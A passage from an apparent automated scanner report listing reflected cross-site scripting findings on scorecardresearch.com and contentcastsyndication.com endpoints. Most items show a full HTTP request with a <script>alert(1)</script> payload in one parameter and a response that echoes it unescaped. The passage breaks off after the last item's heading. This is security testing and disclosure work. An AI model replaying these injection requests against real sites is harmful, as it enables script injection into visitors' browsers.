This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=20734&c5=48075&c6=&c10=248531&c15=dead0<script>alert(1)</script>2fd33f4ff81 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=btfb;sz=300x250;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Fri, 14 Oct 2011 13:17:13 GMT
Date: Fri, 30 Sep 2011 13:17:13 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"20734", c5:"48075", c6:"", c10:"248531", c15:"dead0<script>alert(1)</script>2fd33f4ff81", c16:"", r:""});



2.43. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 446ce<script>alert(1)</script>146adaee14e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113446ce<script>alert(1)</script>146adaee14e&c3=13&c4=20734&c5=48075&c6=&c10=248531&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=btfb;sz=300x250;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Fri, 14 Oct 2011 13:17:09 GMT
Date: Fri, 30 Sep 2011 13:17:09 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113446ce<script>alert(1)</script>146adaee14e", c3:"13", c4:"20734", c5:"48075", c6:"", c10:"248531", c15:"", c16:"", r:""});



2.44. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload dac90<script>alert(1)</script>38cb4eb12b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13dac90<script>alert(1)</script>38cb4eb12b&c4=20734&c5=48075&c6=&c10=248531&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=btfb;sz=300x250;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Fri, 14 Oct 2011 13:17:10 GMT
Date: Fri, 30 Sep 2011 13:17:10 GMT
Content-Length: 1248
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13dac90<script>alert(1)</script>38cb4eb12b", c4:"20734", c5:"48075", c6:"", c10:"248531", c15:"", c16:"", r:""});



2.45. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f4f8e<script>alert(1)</script>7cc7f69e67 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=20734f4f8e<script>alert(1)</script>7cc7f69e67&c5=48075&c6=&c10=248531&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=btfb;sz=300x250;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Fri, 14 Oct 2011 13:17:11 GMT
Date: Fri, 30 Sep 2011 13:17:11 GMT
Content-Length: 1248
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
,f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"20734f4f8e<script>alert(1)</script>7cc7f69e67", c5:"48075", c6:"", c10:"248531", c15:"", c16:"", r:""});



2.46. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 86c87<script>alert(1)</script>84d7d7102c0 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=20734&c5=4807586c87<script>alert(1)</script>84d7d7102c0&c6=&c10=248531&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=btfb;sz=300x250;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Fri, 14 Oct 2011 13:17:11 GMT
Date: Fri, 30 Sep 2011 13:17:11 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
omscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"20734", c5:"4807586c87<script>alert(1)</script>84d7d7102c0", c6:"", c10:"248531", c15:"", c16:"", r:""});



2.47. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 6d792<script>alert(1)</script>296ad39f3a8 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=20734&c5=48075&c6=6d792<script>alert(1)</script>296ad39f3a8&c10=248531&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=btfb;sz=300x250;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Fri, 14 Oct 2011 13:17:12 GMT
Date: Fri, 30 Sep 2011 13:17:12 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"20734", c5:"48075", c6:"6d792<script>alert(1)</script>296ad39f3a8", c10:"248531", c15:"", c16:"", r:""});



2.48. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [audience parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the audience request parameter is copied into the HTML document as plain text between tags. The payload 9da3a<script>alert(1)</script>b9a7d279ab2 was submitted in the audience parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign&audience=Consumer9da3a<script>alert(1)</script>b9a7d279ab2&banner=Button_180x90_Image&category=63&i=1&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1100
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign&audience=Consumer9da3a%3
...[SNIP]...
cal_Audience~1=Consumer9da3ascriptalert(1)/scriptb9a7d279ab2!)[]&i=1&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Consumer9da3a<script>alert(1)</script>b9a7d279ab2",category:"63",banner:"Button_180x90_Image",domain:"c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com"};
$$.processQueue(scriptname);
} catch (ex) {
$$
...[SNIP]...

2.49. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload 334bf<script>alert(1)</script>b8d16b2588f was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign&audience=Consumer&banner=Button_180x90_Image334bf<script>alert(1)</script>b8d16b2588f&category=63&i=1&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1104
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign&audience=Consumer&banner
...[SNIP]...
aign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=1&banner=Button_180x90_Image334bf<script>alert(1)</script>b8d16b2588f",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Consumer",category:"63",banner:"Button_180x90_Image334bf<script>
...[SNIP]...

2.50. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the category request parameter is copied into the HTML document as plain text between tags. The payload ffb19<script>alert(1)</script>05c54c4f024 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign&audience=Consumer&banner=Button_180x90_Image&category=63ffb19<script>alert(1)</script>05c54c4f024&i=1&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1104
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign&audience=Consumer&banner
...[SNIP]...
true;
$$.scriptMap[scriptname].retObj = {SyndicationType:"campaign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx?p6(ct1&cd63ffb19<script>alert(1)</script>05c54c4f024i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=1&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Consumer",category:"63ffb19<
...[SNIP]...

2.51. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload 214a7<script>alert(1)</script>5550167482e was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign&audience=Consumer&banner=Button_180x90_Image&category=63&i=1214a7<script>alert(1)</script>5550167482e&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 1063
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign&audience=Consumer&banner
...[SNIP]...
bj = {SyndicationType:"campaign",project:"microsoft",show:"true",url:"c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=1214a7<script>alert(1)</script>5550167482e&banner=Button_180x90_Image",ElementType:"campaign",ElementAction:"lightbox",extra:"{width: '750', height: '600'}",audience:"Consumer",category:"63",banner:"Button_180x90_Image",domain:"c63445482505619
...[SNIP]...

2.52. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/CSP [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /CSP

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 9b36d<script>alert(1)</script>7275d5548c2 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign9b36d<script>alert(1)</script>7275d5548c2&audience=Consumer&banner=Button_180x90_Image&category=63&i=1&parentUrl=http%3A//www.cybertronpc.com/ HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/javascript; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 677
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "CSP?csp_request_type=validate&legacy=true&spanId=40074055&t=campaign9b36d%3Cscript%3Ealert(1)
...[SNIP]...
tton_180x90_Image&category=63&i=1&parentUrl=http%3A//www.cybertronpc.com/";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {SyndicationType:"campaign9b36d<script>alert(1)</script>7275d5548c2",project:"microsoft",show:"false"};
$$.processQueue(scriptname);
} catch (ex) {
$$.log("Error in Queue:" + ex);
};
})(CSP_GLOBAL);
}

2.53. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the banner request parameter is copied into the HTML document as plain text between tags. The payload 35015<script>alert(1)</script>f8604bba072 was submitted in the banner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=1&banner=Button_180x90_Image35015<script>alert(1)</script>f8604bba072 HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 1857
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:59 GMT
Date: Fri, 30 Sep 2011 13:28:59 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...



if (typeof(CSP_GLOBAL) != "undefined"){
(function($$) {
try {
var scriptname = "d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=1&banner=Button_180x90_Image35015<script>alert(1)</script>f8604bba072";
$$.scriptMap[scriptname].ready = true;
$$.scriptMap[scriptname].retObj = {id: "1", l: "EN", fb: 1?false:true};
if ($$.scriptMap[scriptname].retObj.fb)

...[SNIP]...

2.54. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload 63577<script>alert(1)</script>8fd1ae0075a was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d1.aspx?p6(ct1&cd63i99&fCampaigns_Local_Audience~1=Consumer!)[]&i=163577<script>alert(1)</script>8fd1ae0075a&banner=Button_180x90_Image HTTP/1.1
Host: c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.cybertronpc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 2098
Cache-Control: no-cache
Expires: Fri, 30 Sep 2011 13:28:58 GMT
Date: Fri, 30 Sep 2011 13:28:58 GMT
Connection: close

if (typeof (CspCampaigns) == "undefined") {
function CspCampaign(id, banner, url, weight, date, sid, sname) {
this._banner = banner;
this._url = url;
this._weight = weight;
...[SNIP]...
n(instance) {
if (typeof (this.collection[instance]) != "undefined")
return this.collection[instance];
else return null;
}
};
}

CspCampaigns.Init("163577<script>alert(1)</script>8fd1ae0075a", "1");


(function(collection, instance) {
var c = new CspCampaign("Micr_Genuine_Res_Cus_ConBus", "https://12.contentcastsyndication.com/FTP/Campaign/Microsoft/Micr_Genuine_Res_ConBus/en/Banners/
...[SNIP]...

2.55. http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com/d1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c634454825056194218-pmicrosoft-l1-i1.contentcastsyndication.com
Path:   /d1.aspx

Issue detail

